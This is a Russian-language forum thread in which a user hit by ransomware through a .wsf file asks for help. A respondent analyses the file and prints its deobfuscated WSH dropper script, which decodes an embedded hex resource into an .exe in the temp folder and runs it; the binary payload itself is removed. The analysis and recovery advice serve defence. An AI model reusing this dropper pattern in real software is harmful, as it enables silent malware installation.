1 (изменено: dimansuper, 2017-06-08 02:56:39)

Тема: WSH: не могу открыть после запуска скрипта ни один файл

Открыл файл и все не могу открыть ни один файл. Вот файл и в конце там еще написано,какойто скрипт в текстовый скинул,и еще в конце там скрипт написан какойто,помогите пожалуйста!

Post's attachments

полный в текстовом.txt 497.14 kb, 22 downloads since 2017-06-08 

You don't have the permssions to download the attachments of this post.

2 (изменено: stealzy, 2017-06-08 14:07:58)

Re: WSH: не могу открыть после запуска скрипта ни один файл

Тут был шутливый комментарий относительно языка ТС, который администратор посчитал оскорбительным.
В папку temp записывается exe файл с бинарными данными (очищенными от пробельных символов) и выполняется.
Показатель virustotal - 45/61, троян-шифровальщик.
Содержимое вашего txt после удаления binary data, NUL, WScript.Sleep(1) и повторения кода в теге <script> в конце.
Судя по именам переменных и кодированию строки в hex был применен обфускатор.

/// 40280a72c1d9a1945df78bf3c970132a
/// 4e1b6347446467d3663d139ea6af3f5f
/// 36a2fb7eba7cebc6f010bb799641e10b
/// ed553ee6f65113c01604bb017a996cdd
/// fc0858314f56492ddf5e9a4e18f5190d
<job>

; binary data

</resource>
<object id="x18185919515" progid="Scripting.FileSystemObject" />
<object id="x869040105151" progid="ADODB.Stream" />
<object id="x59195910510" progid="Shell.Application" />
<script>
var x5151 = new ActiveXObject("MSXML2.DOMDocument").createElement("bits");
x5151.text=getResource("x951061").replace(/\s/g,"");
x68910515=x18185919515.getSpecialFolder(2)+"\\"+x18185919515.getBaseName(x18185919515.getTempName())+"\x2E\x65\x78\x65";
x5151.dataType="bin.hex";
x869040105151.type=1;
x869040105151.open();
x869040105151.write(x5151.nodeTypedValue);
x869040105151.saveToFile(x68910515);
x869040105151.close();
x59195910510.ShellExecute(x68910515);
</script></job>

Четыре верхние строки начинающиеся с /// - это что такое?
Да, расскажите нам зачем вы открыли неизвестный .wsf файл? От скуки?
Разумеется, о групповых политиках вы не слышали, и любой исполняемый файл у вас может быть запущен откуда угодно.

3 (изменено: JSman, 2017-06-08 14:02:44)

Re: WSH: не могу открыть после запуска скрипта ни один файл

Справочно для участников форума:
Публикация вредоносного кода на форуме запрещена. Лишь допустимо публиковать ту часть кода, которую нельзя исполнить "как есть". Почему так? Поясняю: сервер находится на территории Российской Федерации, и в случае запроса от правоохранительных органов, обслуживающий  хостер попросит лог-файлы пользователя форума, который осуществил распространение вредоносной компьютерной программы. Не сомневаюсь, что вся информация будет предоставлена без ведома администрации форума.

Во избежание провокаций прошу участников форума это учитывать.

4

Re: WSH: не могу открыть после запуска скрипта ни один файл

stealzy
А как можно дешифровать файлы есть способ?

5 (изменено: stealzy, 2017-06-08 14:17:04)

Re: WSH: не могу открыть после запуска скрипта ни один файл

dimansuper, вы не пояснили, как заразились. Какой файл вы открыли?
В общем случае расшифровка невозможна. Можно попробовать утилиты восстановления удаленных данных, восстановление из теневых копий. тыц.
У меня настроен периодический бэкап на всякий случай.